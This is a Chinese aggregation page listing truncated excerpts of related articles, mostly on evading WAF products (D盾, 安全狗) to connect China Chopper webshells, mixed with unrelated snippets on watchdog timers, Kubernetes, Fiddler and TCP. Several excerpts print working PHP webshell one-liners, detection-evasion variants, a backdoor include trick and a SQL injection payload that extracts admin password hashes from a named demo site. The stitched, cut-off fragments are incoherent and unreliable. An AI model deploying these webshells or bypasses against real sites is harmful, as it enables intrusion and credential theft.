绕过D盾安全狗连接菜刀】的更多相关文章

0x00 各种奇葩符号 现在基本上没啥用了,毕竟几年前的小玩意儿 /;.xxx.asp;.jpg /;.asp/.jpg 像这种各位看官可以忽略了,毕竟某狗和某盾也不是吃干饭的,写出来只是为了纪念一下 ),抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 code: <% JmStr=Replace(Request.Form,"$_POST","$_REQUEST") JmStr=Replace(JmStr,"…
0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐.安全宝等部署在云端的WAF 3. 硬件WAF WAF的检测主要有三个阶段,我画了一张图进行说明 本文主要总结的就是针对上面的三个阶段的绕过策略.小菜一枚,欢迎拍砖. 0x02 WAF身份认证阶段的绕过 WAF是有一个白名单的,在白名单内的客户请求将不做检测 (1)伪造搜索引擎 早些版本的安全狗是有这个漏洞的,就是把User-Agent修改为搜索引擎,便可以绕过,进行sql注入等攻击,论坛bl…
一个很简单的一个技巧,作个笔记,可以绕过D盾检测. 新建test1.php <?php eval($_POST[g]); ?> 新建test2.php <?php $a="$_POST[g]"; eval($a=$a); ?> 使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀. 那么问题就出现在eval($a=$a)这样的形式,eval()很容易就被查杀出来,但对于这样一种形式就无法查杀. 可以预见基于…
PHP常见的代码执行函数: eval() assert() preg_replace() create_function() array_map() call_user_func() call_user_func_array() array_filter usort uasort() PHP常见的命令执行函数 system() exec() shell_exec() passthru() pcntl_exec() popen() proc_open() 常见的一句话 <?php eval($_P…
d_dun.php <?php $a = '小狗狗你好啊'; $b = '小盾盾你好啊'; foreach ($_REQUEST as $key => $value) { $$key = $value; } 注入页插入: <?php include 'd_dun.php'; $b( $a ); 注入页调用: ?b=assert&a=phpinfo() 转载自: https://www.0dayhack.com/post-862.html…
目标站:www.chinaparkview.cn 云盾挡着了 查一下历史IP 查出3月9号的IP是103.249.104.114 当然查出来的不一定准确 修改本地host文件 PS:不要加http 然后保存. win的需要重启.linunx则不用 如果说重启以后ping www.chinaparkview.cn的IP还是103.249.104.114的话说明这个IP是正确的.…
hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx 本文作者:i春秋签约作家——凉风 引用i春秋作家团大佬@非主流  对一句话木马的理解: 一句话木马的意思就是,我们制造了一个包含远程代码执行漏洞的web页面. 目录:0×01:我没有aspx代码编写基础,我该从哪入手?0×02:正式开始:从过狗菜刀配置文件里寻找思路0×03:再写一个:分析各种拦截机制,一一绕过0×04:总结 0×01:…
绕过安全狗sql注入 http://demo.74cms.com/plus/ajax_common.php?act=hotwordquery=錦union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 被拦截了,经过测试拦截的是select,那么把select换成/*!50000SeLect*/呢 然后提交 http://demo.7 被拦截了,经过测试拦截的是select,那么把s…
转自圈子404师傅 0x01 前言# 尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧 0x02 目录# 关于eval 于 assert 字符串变形 定义函数绕过 回调函数 回调函数变形 特殊字符干扰 数组 类 编码绕过 无字符特征马 PHP7.1后webshell何去何从 总结 0x03 关于eval 于 assert# 关于eval函数在php给出的官方说明是 eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给…
大纲: WAF防护原理讲解 目录扫描绕过WAF 手工注入绕过WAF sqlmap绕过WAF 编写salmap绕过WAF 过WAF一句话编写讲解 菜刀连接绕过WAF webshell上传绕过WAF 提权绕过WAF WAF绕过原理详解 知己知彼百战百胜 了解WAF防护原理 查看WAF防护位置 熟悉防护规则 了解防护机制 查看拦截时间阀值 目录扫描绕过WAF 两种方式: 1.修改客户端IP 2.减慢扫描速度 3.通过代理欺骗WAF 手工注入绕过WAF 搭建测试环境 了解绕过原理 熟悉常见绕过构造语句…
原理 基于Cookie值 Citrix Netscaler(2013年使用广泛) “Citrix Netscaler”会在HTTP返回头部Cookie位置加入“ns_af”的值,可以以此判断为Citrix Netscaler的WAF,国内此类WAF很少 GET / HTTP/1.1 Host: target.com User-Agent: Mozilla/ Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q…
前言 通常再一个web程序中,一般会存在登陆注册功能,登陆后一般会有上传头像等功能,如果上传验证不严格就可能造成攻击者直接上传木马,进而控制整个web业务控制权.下面通过实例,如果程序只进行了客户端JavaScript检测,咱们如何来绕过. 正文 工具准备:DVWA程序,burpsuite,中国菜刀. 首先本地创建一个.txt文档,里面写入咱们的一句话木马,然后将后缀名改为.php,一句话木马为 <?php eval($_POST[-7]);?> //连接菜刀的密码为-7 然后打开DVWA程序…
0x00 前言 本文首发于先知社区:https://xz.aliyun.com/t/9507 我们知道WAF分为软WAF,如某狗,某盾等等:云WAF,如阿里云CDN,百度云CDN等等:硬WAF,如天融信,安恒等等,无论是软WAF.云WAF还是硬WAF,总体上绕过的思路都是让WAF无法获取到文件名或者其他方式无法判断我们上传的木马(PHP.JSP.ASP.ASPX等等). 这里总结下关于软waf中那些绕过文件上传的姿势和尝试思路,这里选择绕过的软waf为某狗4.0,可能其他软waf在拦截关键字方面…
个PCLK周期的复位信号 也就是说,在某些环境下,看门狗可以当做定时器使用,当他中断的时候并不发生复位,只发生中断,我看看图 看门狗的中断和复位信号是可以依靠wtcon来切断的(看门狗的时钟是无法切断的) 使用看门狗主要靠这几个寄存器 用来选择时钟源,分频系数,启动看门狗以及看门狗中断和复位的连接 的时候触发中断,如果连接了复位则触发复位 未连接则触发中断,另外, 看门狗定时器数据寄存器(WTDAT)的值不能被自动重载到定时计数器(WTCNT)中.由于这个理由,必须在看门狗定时器启动前写入一个初…
0x01 前言 之前发了一篇博客<Bypass D盾_IIS防火墙SQL注入防御(多姿势)>,D哥第一时间联系我,对问题进行修复.这段时间与D哥聊了挺多关于D盾这款产品的话题,实在是很佩服,对这样一款产品的细致以及投入.一个人,一款产品,一路走来,弥足艰辛.旧版D盾_防火墙支持win2003,新版D盾_防火墙功能更加强大.前阵子已经拿到最新的内测版本,奈何杂事缠身,一直没有深入的对防御规则进行测试,抽空下载了新发布版本对之前发现的问题进行复测,这里记录一下测试过程. 0x02 SQL注入防御…
D盾旧版: 00前言 D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况.D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置. 构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL),看到这边的策略,主要的测试思路: a.白名单 b.绕过union select或select from的检测 01 PHP+IIS+MY…
Kubernetes Service 用于实现集群中业务之间的互相调用和负载均衡,目前社区的实现主要有userspace,iptables和IPVS三种模式.IPVS模式的性能最好,但依然有优化的空间.该模式利用IPVS内核模块实现DNAT,利用nf_conntrack/iptables实现SNAT.nf_conntrack是为通用目的设计的,其内部的状态和流程都比较复杂,带来很大的性能损耗. 腾讯云 TKE 团队 开发了新的IPVS-BPF模式,完全绕过nf_conntrack的处理逻辑,使用…
#一点补充 在老版本的安全狗中,可通过构造payload: http://xx.xx.xx.xx/sqli-labs/Less-2/index.php/x.txt?id=1 and 1=1 可通过index.php/x.txt正常解析. 根据mysql的一些特性的payload: %23x%0aunion%23x%0Aselect%201,2,3 等价于: # union# select 1,2,3 %20union%20/*!44509select*/%201,2,3 等价于: union /…
TL;DRs 这个错误的原因和HTTPS的代理配置有关,使用SSH方式连接可以避免这一问题 最近git pull和push的时候总是报错 fatal: unable to access 'https://github.com/xx/xx.git/': Proxy CONNECT aborted 试了几种方法,都不太行.但是发现了一个绕过的方法:把连接方式改为SSH 然后尝试 git pull git@github.com/xx/xx.git/ 发现即使不连梯子也可以正常拉取和推送. 然后把.gi…
先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权:未经授权请勿转载.先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com: Author:Tr3jer_CongRong Blog:www.Thinkings.org 第一篇<[独家连载]我的WafBypass之道(SQL注入篇)>地址:https://www.secpulse.com/archives/53328.html 第二篇<[独家连载]我的WafBypa之道(upload篇)&g…
版权和内容说明: 这篇文章不是本站编写,是从网络上摘抄的,但是经过了本站的改写优化,并将内容,格式规范化. 本篇说明:这篇文章结合了前辈们前几年一路挖掘出来的主流程序漏洞以及思路, 小编写在前面是想让大家大致了解一下,因为<渗透课程>以后的内容,就是围绕着本篇所涉及的内容进行深度逻辑原理剖析. 这是一篇比较完全的基本渗透笔记.看不懂没关系,后面会一一讲解不过本章的内容读者们要尽量保存,可能会在拿站的时候应用到呢! 常见网站程序asp类: foosun(风讯) kesion(科汛) newasp…
相关学习资料 http://drops.wooyun.org/tips/2245 http://www.cnblogs.com/siqi/archive/2012/11/21/2780966.html http://hi.baidu.com/liveinyc/item/08d5e71cfb2872416926bb84 http://blog.chinaunix.net/uid-16728139-id-3683449.html http://linux.chinaunix.net/techdoc/…
Author:JoyChouDate:20180613 1. 前言 本文的测试环境均为 nginx/1.10.3 PHP 5.5.34 有些特性和 语言及webserver有关,有问题的地方,欢迎大家指正. 2. 文件上传的特征 先来了解下文件上传的特征,抓包看看这段文件上传代码的HTTP请求. upload.php <?php if(isset($_POST['submit_x'])){     $upfile = $_FILES['filename']['name'];     $tempf…
一.访问链接 二.下载系统源码后直接放到D盾里扫描,扫到后门文件 三.查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']);?> 1.error_reporting(0);      关闭错误报告 2.$_GET['POST']($_POST['GET']);     一句话木马,GET传入POST值,再将密码:GET以POST请求方式传到后台 因此构造payload:http://219.153.49.228:41996…
ref:https://chybeta.github.io/2017/08/19/Web-Security-Learning/ ref:https://github.com/CHYbeta/Web-Security-Learning Web-Security-Learning 学习资料01月29日更新: 新收录文章 mysql SSRF To RCE in MySQL MSSQL MSSQL不使用xp_cmdshell执行命令并获取回显的两种方法 postgresql 渗透中利用postgres…
Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306"撞库"事件,实质就是暴力破解攻击. 初级:服务器只是验证了参数Login是否被设置(isset函数在php中用来检测变量是否设置,该函数返回的是布尔类型的值,即true/false),没有任何的防爆破机制,且对参数username.password没有做任何过滤,存在明显的sql注入漏洞.所以可以采用万能密码的方式进行登录   1.…
Statistics 页签 完整页签如下图: Statistics 页签显示当前用户选择的 Sessions 的汇总信息,包括:选择的 Sessions 总数.发送字节数.接收字节数.响应类型的汇总表.世界各地通过不同请求方式所需的时间等. Statistics 页签底部图表 Show Chart 可以将汇总结果显示为一个饼状图,按照响应类型,在饼图中显示不同的比例和不同的色块,见上图. Copy this chart 可以将该饼图复制到剪贴板,粘贴到图形处理软件或者 WORD 中. Colla…
才去的中国工商银行,用身份证叫了A0076的号,前边还有26个人,闲来无聊果断拿出手机收取wifi.有两个ssid为ICBC的路由,信道分别是1号和6号,还好不需要密码,不过一会就连接上了. 那我先上个网吧!火狐妹妹,首页我记得是百度吧,咋跳转到了ICBC的网站首页??又在地址栏输入www.baidu.com,奇了怪了.还是跳到ICBC.正好旁边有一台在同花顺显示股票动态的xp台式机,连的也还是ICBC网络,咦-还登了QQ.ie出现和手机一样的问题,ping一下baidu.com,没问题呀.从3…
以下内容纯属虚构,切勿轻易相信! 众所周知,tcp/ip三次握手和四次挥手,均由syn/ack/fin三个标志位报文决定,但是这三个标志位报文,并不是说在构建连接的时候只发送一次的,因为协议不知道网络状况. 故而就存在了以下参数,可以调节发送次数 net.ipv4.tcp_syn_retries 这个参数从字面上来看就是syn标志位报文的重试次数,什么时候发送syn标志位呢?三次握手中,请求端第一次构建连接的时候,默认是5次,但是对于一个处于网络状况好的请 求端,5次显然是多了,因此,我们来个2…
sql注入的分类:布尔型 报错型 可联合查询型 多语句查询型 基于时间延迟注入 1.注释符 # /* -- 2.过滤空格注入 使用/**/或()或+代替空格 3.多条数据显示 concat(str1,str2.....)  可以连接一个或多个字符串,返回结果为连接参数产生的字符串,连接每一行的列 group_concat()  把所有的行连成一行,以逗号分开 concat_ws(separator,str1,str2......)  第一个参数是分隔符,如果分隔符为空,则结果为空. 4.相关函数…